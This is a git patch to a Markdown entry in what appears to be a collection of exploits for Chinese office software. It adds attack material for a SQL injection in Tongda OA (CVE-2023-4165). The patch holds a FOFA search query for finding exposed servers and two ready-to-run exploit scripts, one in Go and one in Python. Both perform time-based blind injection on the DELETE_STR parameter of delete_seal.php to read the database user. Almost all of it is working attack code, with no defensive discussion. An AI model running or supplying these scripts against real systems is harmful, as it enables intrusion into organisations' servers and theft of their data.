From 129e5dcf627548119b2bf9bf2b4bb23937eb72d7 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 4 Nov 2023 22:27:01 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E9=80=9A=E8=BE=BEOA=20sql=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E=20CVE-2023-4165.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 通达OA sql注入漏洞 CVE-2023-4165.md | 111 ++++++++++++++++++++++++++++ 1 file changed, 111 insertions(+) diff --git a/通达OA sql注入漏洞 CVE-2023-4165.md b/通达OA sql注入漏洞 CVE-2023-4165.md index d667f82..d73a0d8 100644 --- a/通达OA sql注入漏洞 CVE-2023-4165.md +++ b/通达OA sql注入漏洞 CVE-2023-4165.md @@ -15,3 +15,114 @@ Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ``` +## FOFA语法: +``` +app="TDXK-通达OA" && icon_hash="-759108386" + +``` +## 利用脚本 +### go +```go +package main + +import ( + "fmt" + "net/http" + "strings" + "time" +) +// 通达OA CVE-2023-4165&CVE-2023-4166 注入漏洞 +func main() { + // /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1 general/system/seal_manage/dianju/delete_log.php + url := "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php" // 目标网站的URL + delay := 2 // 延迟时间,单位为秒 + cookieValue := "PHPSESSID=pv74trjff1qshvt5dktujjfbq3; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=ec800c19" // 替换为有效的Cookie值 + + characters := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_!@#$%^&*()+-" // 可能的字符集 + + result := "" + for i := 1; i <= 30; i++ { // 假设字符的最大长度为30 + found := false + for _, char := range characters { + payload := fmt.Sprintf("1) and (substr(USER(),%d,1))=char(%d) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1", i, int(char)) // 构造payload + //print(payload, "n") + req, err := http.NewRequest("GET", url, nil) + if err != nil { + fmt.Println("创建请求失败:", err) + return + } + + // 使用分号分隔的每个Cookie项 + cookieItems := strings.Split(cookieValue, "; ") + for _, item := range cookieItems { + itemSplit := strings.SplitN(item, "=", 2) // 按照等号(=)分隔键值对 + if len(itemSplit) == 2 { + cookie := &http.Cookie{ + Name: itemSplit[0], + Value: itemSplit[1], + } + req.AddCookie(cookie) + } + } + + req.URL.RawQuery = "DELETE_STR=" + payload //构建请求,其DELETE_STR是本次的注入参数 + + startTime := time.Now() + resp, err := http.DefaultClient.Do(req) + if err != nil { + fmt.Println("发送请求失败:", err) + return + } + defer resp.Body.Close() + + endTime := time.Now() + responseTime := endTime.Sub(startTime) + + if responseTime >= time.Duration(delay)*time.Second { + result += string(char) + fmt.Println("", result) + found = true + break + } + } + + if !found { + break + } + } + + fmt.Println("Database: " + result) +} +``` + +### Python +```python +import requests +import time + +headers={"Cookie":"PHPSESSID=hji419h9o5gc4dk3ftfqocmu42; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=baae495a"} + +characters = "abcdefghijklmnopqrstuvwxyz0123456789_!@#$%^&*()+-" + +url = "http://127.0.0.1/general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=" + +result = "" + +for i in range(1,31): + found = False + for c in characters: + payload = f"1) and (substr(USER(),{i},1))=char({ord(c)}) and (select count(*) from information_schema.columns A,information_schema.columns B) and(1)=(1" + start_time = time.time() + res = requests.get(url=url+payload,headers=headers) + end_time = time.time() + elapsed_time = end_time - start_time + + if elapsed_time >= 2: + result +=c + print(result) + found = True + if not found: + break + +print("Databas:",result) +```